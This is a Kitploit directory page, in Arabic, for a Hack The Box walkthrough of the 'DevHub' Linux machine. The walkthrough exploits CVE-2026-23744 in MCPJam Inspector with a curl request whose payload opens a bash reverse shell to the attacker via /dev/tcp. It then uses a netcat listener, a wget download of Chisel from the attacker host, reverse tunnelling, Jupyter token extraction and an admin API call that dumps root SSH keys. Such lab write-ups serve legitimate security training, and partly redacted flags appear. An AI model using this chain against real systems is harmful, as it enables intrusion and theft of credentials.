Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DevHub-HTB-Walkthrough — Hack The Box - دليل اختراق جهاز DevHub (لينكس متوسط الصعوبة، CVE-2026-23744، نفق Chisel، Jupyter، تصعيد الصلاحيات إلى الجذر) | Kitploit
أدوات/GitHubGitHub/timgad794/devhub-htb-walkthrough
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
timgad794/devhub-htb-walkthrough

DevHub-HTB-Walkthrough

Hack The Box - دليل اختراق جهاز DevHub (لينكس متوسط الصعوبة، CVE-2026-23744، نفق Chisel، Jupyter، تصعيد الصلاحيات إلى الجذر)

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

DevHub – دليل HTB (لينكس متوسط)

الجهاز: DevHub
الصعوبة: Medium
نظام التشغيل: Linux
المواضيع: CVE-2026-23744, Chisel Tunneling, Jupyter, Flask API, تصعيد صلاحيات الجذر


📌 1. الاستطلاع

root@kitploit:~
nmap -sC -sV devhub.htb

النتيجة:

  • المنفذ 22 (SSH)
  • المنفذ 80 (HTTP)
  • المنفذ 6274 (MCPJam Inspector)

📌 2. تعديل ملف المضيفين

root@kitploit:~
echo "10.x.x.x devhub.htb" >> /etc/hosts

📌 3. استكشاف الموقع

  • http://devhub.htb/ → صفحة الهبوط
  • http://devhub.htb:6274/ → MCPJam Inspector v1.4.2 (ضعيف لـ CVE-2026-23744)

📌 4. شل عكسية كمستخدم mcp-dev

المحطة 1 – المستمع:

root@kitploit:~
nc -lvnp 4444

المحطة 2 – الحمولة:

root@kitploit:~
curl -X POST http://devhub.htb:6274/api/mcp/connect \
  -H "Content-Type: application/json" \
  -d '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/10.x.x.x/4444 0>&1"],"env":{}},"serverId":"mytest"}'

✅ شل كمستخدم mcp-dev

📌 5. إعداد نفق Chisel

خادم HTTP (المهاجم):

root@kitploit:~
python3 -m http.server 8000 --bind 10.x.x.x

تنزيل Chisel على الهدف (شل mcp-dev):

root@kitploit:~
cd /tmp
wget http://10.x.x.x:8000/chisel
chmod +x chisel

خادم Chisel (المهاجم):

root@kitploit:~
./chisel server --reverse --port 9001

عميل Chisel (شل mcp-dev):

root@kitploit:~
./chisel client 10.x.x.x:9001 R:8888:127.0.0.1:8888 &

📌 6. الوصول إلى Jupyter

استخراج الرمز (شل mcp-dev):

root@kitploit:~
ps aux | grep jupyter | grep -v grep

الرمز: a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2xxxxxxxxxx

المتصفح: http://localhost:8888/?token=...

📌 7. الحصول على مفتاح SSH للجذر (في Jupyter)

root@kitploit:~
import requests, json

url = "http://127.0.0.1:5000/tools/call"
headers = {"X-API-Key": "opsmcp_secret_key_4f5a6b7xxxxxxxxx", "Content-Type": "application/json"}
payload = {"name": "ops._admin_dump", "args": {"target": "ssh_keys", "confirm": True}}

response = requests.post(url, headers=headers, json=payload)
print(json.dumps(response.json(), indent=2))

📌 8. تسجيل الدخول كجذر

root@kitploit:~
nano root_key
# أضف المفتاح
chmod 600 root_key
ssh -i root_key [email protected]

📌 9. الأعلام

root@kitploit:~
cat /root/root.txt 
cat /home/analyst/user.txt

علم الجذر:

08be4cfb68597d0f9edfccxxxxxxxxxx


بالتوفيق! 🚀

تنزيل الأداة